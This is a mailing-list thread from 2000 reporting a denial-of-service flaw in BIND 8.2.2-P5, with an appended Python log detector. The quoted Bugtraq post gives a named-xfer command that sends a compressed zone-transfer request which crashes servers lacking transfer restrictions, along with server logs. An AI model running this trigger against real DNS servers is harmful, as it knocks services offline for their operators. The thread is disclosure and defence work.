
Re: Bind-8.2.2-P5 DOS



My hosts are only vulnerable when the allow_transfer { ... }; is not
configured in named.conf. Without it, named dies after +- 1 minute; if
defined, there is just an error message in /var/log/daemon.

Arno Vije

On Thu, 9 Nov 2000, Jean-Marc Boursot wrote:

> 
> Debian 2.2 IS vulnerable to the following DOS reported by Fabio
> Pietrosanti (naif) <fabio@TELEMAIL.IT> in bugtraq:
> 
> <<
> Hi,
> playing with bind and the ZXFR feature (zone transfer compressed with a
> possibly insecure execlp("gzip", "gzip", NULL); ), I discovered a
> Denial Of Service against Bind 8.2.2-P5.
> 
> By default Bind 8.2.2-P5 is not compiled with ZXFR support unless
> you define it with #define BIND_ZXFR, so it will refuse any ZXFR
> transfer, because it doesn't support it. But now what happens? Look
> here...
> 
> ################################
> zone to transfer: zone.pippo.com
> dns server:       dns.pippo.com 192.168.1.1
> me:               naif.gatesux.com 10.10.10.10
> I send a Zone Transfer request using the "-Z" switch, which means that I wish to use ZXFR.
> dns.pippo.com doesn't support ZXFR and has "allow-transfer{}" not configured, so everyone
> could ask him for *.zone.pippo.com ...
> 
> <naif@naif> [~/bind/src822p5/bin/named-xfer] $ ./named-xfer  -z zone.pippo.com  -d 9 -f pics -Z dns.pippo.com
> named-xfer[29297]: send AXFR query 0 to 192.168.1.1
> named-xfer[29297]: premature EOF, fetching "zone.pippo.com"
> 
> On the server's log:
> Nov  7 11:19:09 dns.pippo.com: named[188510]: approved ZXFR from [10.10.10.10].2284 for "zone.pippo.com"
> Nov  7 11:19:09 dns.pippo.com: named[188510]: unsupported XFR (type ZXFR) of "zone.pippo.com" (IN) to [10.10.10.10].2284
> 
> Then the server "*** CRASHED ***" .
> 
> I should assume that bind 8.2.2-P5 is vulnerable (please, someone test and confirm this kind of DOS)
> and bind-9.0.0 has no support for ZXFR.
> 
> <naif@naif> [~/bind] $ find src822p5/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
>     234
> <naif@naif> [~/bind] $ find bind-9.0.0/ -type f -exec grep -i zxfr \{\}  ';' | wc -l
>       0
> 
> A lot of DNS servers are misconfigured, and allow zone-transfer to any, so they are dossable...
> 
> 
> naif
> naif@itapac.net
> >>
> 
> Here is my daemon.log:
> 
> Nov  9 15:13:19 ns12 named[137]: approved ZXFR from [192.168.1.10].1642 for "domain.org"
> Nov  9 15:13:19 ns12 named[137]: unsupported XFR (type ZXFR) of "domain.org" (IN) to [192.168.1.10].1642
> Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
> Nov  9 15:22:01 ns12 named[137]: db_update: DB_F_ACTIVE set
> 
> And named was down...
> 
> Regards,
> 
> Jean-Marc Boursot
> 
> 
> 
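
Added example (not part of the original thread, and not code from BIND or Debian): a log check that pairs the two named messages quoted above, "approved ZXFR" and "unsupported XFR (type ZXFR)", and marks clients that are not expected to transfer zones. The function name, the `secondaries` list and the sample lines are assumptions made for illustration.

```python
import re

# Patterns follow the two named messages quoted in this thread.
APPROVED = re.compile(
    r'named\[(?P<pid>\d+)\]: approved ZXFR from '
    r'\[(?P<ip>[0-9.]+)\]\.(?P<port>\d+) for "(?P<zone>[^"]+)"')
UNSUPPORTED = re.compile(
    r'named\[(?P<pid>\d+)\]: unsupported XFR \(type ZXFR\) of '
    r'"(?P<zone>[^"]+)" \(IN\) to \[(?P<ip>[0-9.]+)\]\.(?P<port>\d+)')

def find_zxfr_events(lines, secondaries=frozenset()):
    """Pair each approved ZXFR with its 'unsupported XFR' follow-up.

    secondaries: IPs expected to transfer zones (hypothetical input).
    Returns one dict per (client, port, zone), in order of appearance.
    """
    events = {}
    for line in lines:
        m = APPROVED.search(line)
        if m:
            key = (m["ip"], m["port"], m["zone"])
            events[key] = {
                "client": m["ip"], "zone": m["zone"], "pid": int(m["pid"]),
                "expected_client": m["ip"] in secondaries,
                "unsupported_xfr": False,
            }
            continue
        m = UNSUPPORTED.search(line)
        if m:
            key = (m["ip"], m["port"], m["zone"])
            if key in events:
                events[key]["unsupported_xfr"] = True
    return list(events.values())

# Constructed sample lines in the same format (documentation addresses).
SAMPLE_LOG = [
    'Nov  9 15:13:19 ns1 named[137]: approved ZXFR from [192.0.2.10].1642 for "example.org"',
    'Nov  9 15:13:19 ns1 named[137]: unsupported XFR (type ZXFR) of "example.org" (IN) to [192.0.2.10].1642',
    'Nov  9 15:14:02 ns1 named[137]: approved ZXFR from [198.51.100.7].2284 for "example.org"',
    'Nov  9 15:20:00 ns1 named[137]: unrelated message',
]

if __name__ == "__main__":
    for ev in find_zxfr_events(SAMPLE_LOG, secondaries={"198.51.100.7"}):
        note = "expected" if ev["expected_client"] else "UNEXPECTED CLIENT"
        print(ev["client"], ev["zone"], "unsupported_xfr=%s" % ev["unsupported_xfr"], note)
```

An "approved ZXFR" line from an address outside the secondaries list indicates that the server's transfer ACL let that host through, which is the condition both posters associate with the crash.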


